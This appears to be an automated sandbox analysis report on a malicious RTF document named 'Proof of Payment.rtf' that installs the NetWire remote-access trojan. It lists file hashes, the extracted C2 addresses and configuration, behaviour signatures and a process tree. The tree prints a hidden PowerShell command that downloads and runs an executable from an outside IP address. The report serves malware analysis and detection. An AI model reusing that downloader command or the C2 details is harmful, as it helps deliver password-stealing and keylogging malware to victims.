Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • resource tags

    arch:x64arch:x86image:win7-20220414-enlocale:en-usos:windows7-x64system
  • submitted
    15-07-2022 11:54

General

  • Target

    Proof of Payment.rtf

  • Size

    230KB

  • MD5

    ccb4d123d7d23778dc3b804f8b4c551a

  • SHA1

    6abaeacc98255a7a8048f0a62a7b983720c904da

  • SHA256

    c4155eb3caee31efbcf7672f25c39e875b81bba26400cf0c4d4840e534491122

  • SHA512

    0ae4ac069b843d2bb45064a29fed582970d15621135ef5b584f10d7aee6be71a049085f317161eb3980cc05efcd65d1c3aefb98c3bd1a1139286d03934367cca

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://192.3.194.246/new.exe

Extracted

Family

netwire

C2

194.5.98.188:3364

194.5.98.188:3366

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • keylogger_dir

    %AppData%\Logs\

  • lock_executable

    false

  • offline_keylogger

    true

  • password

    j5m52xuc

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 12 IoCs
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Proof of Payment.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1048
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1052
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Users\Admin\AppData\Roaming\new.exe
        C:\Users\Admin\AppData\Roaming\new.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1548
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1772
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          4⤵
            PID:1880
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
        2⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1300
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
        2⤵
        • Process spawned unexpected child process
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Users\Admin\AppData\Roaming\new.exe
          C:\Users\Admin\AppData\Roaming\new.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:544
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            4⤵
              PID:676
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
          2⤵
          • Process spawned unexpected child process
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1464
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
          2⤵
          • Process spawned unexpected child process
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1160
          • C:\Users\Admin\AppData\Roaming\new.exe
            C:\Users\Admin\AppData\Roaming\new.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1676
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              4⤵
                PID:1608
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            2⤵
              PID:2004

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            b89e63484dc9c78b94f63337a140cc11

            SHA1

            394026ca31ad6ad3a73584dbd345fe64eb29114c

            SHA256

            e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

            SHA512

            9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            b89e63484dc9c78b94f63337a140cc11

            SHA1

            394026ca31ad6ad3a73584dbd345fe64eb29114c

            SHA256

            e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

            SHA512

            9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            b89e63484dc9c78b94f63337a140cc11

            SHA1

            394026ca31ad6ad3a73584dbd345fe64eb29114c

            SHA256

            e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

            SHA512

            9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            b89e63484dc9c78b94f63337a140cc11

            SHA1

            394026ca31ad6ad3a73584dbd345fe64eb29114c

            SHA256

            e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

            SHA512

            9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

            Filesize

            7KB

            MD5

            b89e63484dc9c78b94f63337a140cc11

            SHA1

            394026ca31ad6ad3a73584dbd345fe64eb29114c

            SHA256

            e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a

            SHA512

            9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gruaeg\Bblqwrox.exe

            MD5

            d41d8cd98f00b204e9800998ecf8427e

            SHA1

            da39a3ee5e6b4b0d3255bfef95601890afd80709

            SHA256

            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

            SHA512

            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Gruaeg\Bblqwrox.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • C:\Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • C:\Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • C:\Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • C:\Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • \Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • \Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • \Users\Admin\AppData\Roaming\new.exe

            Filesize

            75KB

            MD5

            59b5570fd782ef0503a49fd7470200b6

            SHA1

            1738e6b2ecb79b85e950a9734469404002cbb195

            SHA256

            f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650

            SHA512

            2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135

          • memory/544-134-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/544-138-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/544-104-0x0000000000000000-mapping.dmp

          • memory/544-112-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/676-152-0x000000000040242D-mapping.dmp

          • memory/676-172-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1048-78-0x00000000719ED000-0x00000000719F8000-memory.dmp

            Filesize

            44KB

          • memory/1048-54-0x0000000072F81000-0x0000000072F84000-memory.dmp

            Filesize

            12KB

          • memory/1048-58-0x00000000719ED000-0x00000000719F8000-memory.dmp

            Filesize

            44KB

          • memory/1048-55-0x0000000070A01000-0x0000000070A03000-memory.dmp

            Filesize

            8KB

          • memory/1048-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1048-57-0x0000000075C51000-0x0000000075C53000-memory.dmp

            Filesize

            8KB

          • memory/1052-61-0x000000006B3F0000-0x000000006B99B000-memory.dmp

            Filesize

            5.7MB

          • memory/1052-59-0x0000000000000000-mapping.dmp

          • memory/1052-62-0x000000006B3F0000-0x000000006B99B000-memory.dmp

            Filesize

            5.7MB

          • memory/1160-99-0x0000000000000000-mapping.dmp

          • memory/1300-81-0x0000000000000000-mapping.dmp

          • memory/1300-87-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1300-86-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1300-85-0x0000000004D70000-0x0000000005042000-memory.dmp

            Filesize

            2.8MB

          • memory/1344-90-0x0000000000000000-mapping.dmp

          • memory/1464-91-0x0000000000000000-mapping.dmp

          • memory/1464-97-0x0000000004CF0000-0x0000000004FC2000-memory.dmp

            Filesize

            2.8MB

          • memory/1464-98-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1504-63-0x0000000000000000-mapping.dmp

          • memory/1548-66-0x0000000000000000-mapping.dmp

          • memory/1548-72-0x0000000004300000-0x000000000434C000-memory.dmp

            Filesize

            304KB

          • memory/1548-71-0x0000000000440000-0x0000000000480000-memory.dmp

            Filesize

            256KB

          • memory/1548-70-0x0000000002080000-0x00000000020E0000-memory.dmp

            Filesize

            384KB

          • memory/1548-68-0x00000000009A0000-0x00000000009B8000-memory.dmp

            Filesize

            96KB

          • memory/1608-168-0x000000000040242D-mapping.dmp

          • memory/1608-173-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1676-101-0x0000000000000000-mapping.dmp

          • memory/1772-73-0x0000000000000000-mapping.dmp

          • memory/1772-117-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1772-77-0x0000000004C30000-0x0000000004F02000-memory.dmp

            Filesize

            2.8MB

          • memory/1772-79-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1772-80-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1772-116-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1880-119-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-124-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-127-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-128-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-129-0x000000000040242D-mapping.dmp

          • memory/1880-132-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-133-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-125-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-118-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-123-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1880-121-0x0000000000400000-0x0000000000433000-memory.dmp

            Filesize

            204KB

          • memory/1916-136-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1916-139-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/1916-114-0x0000000004D30000-0x0000000005002000-memory.dmp

            Filesize

            2.8MB

          • memory/1916-108-0x0000000000000000-mapping.dmp

          • memory/1916-115-0x0000000067690000-0x0000000067C3B000-memory.dmp

            Filesize

            5.7MB

          • memory/2004-137-0x000007FEFC3E1000-0x000007FEFC3E3000-memory.dmp

            Filesize

            8KB

          • memory/2004-135-0x0000000000000000-mapping.dmp

          • memory/2020-88-0x0000000000000000-mapping.dmp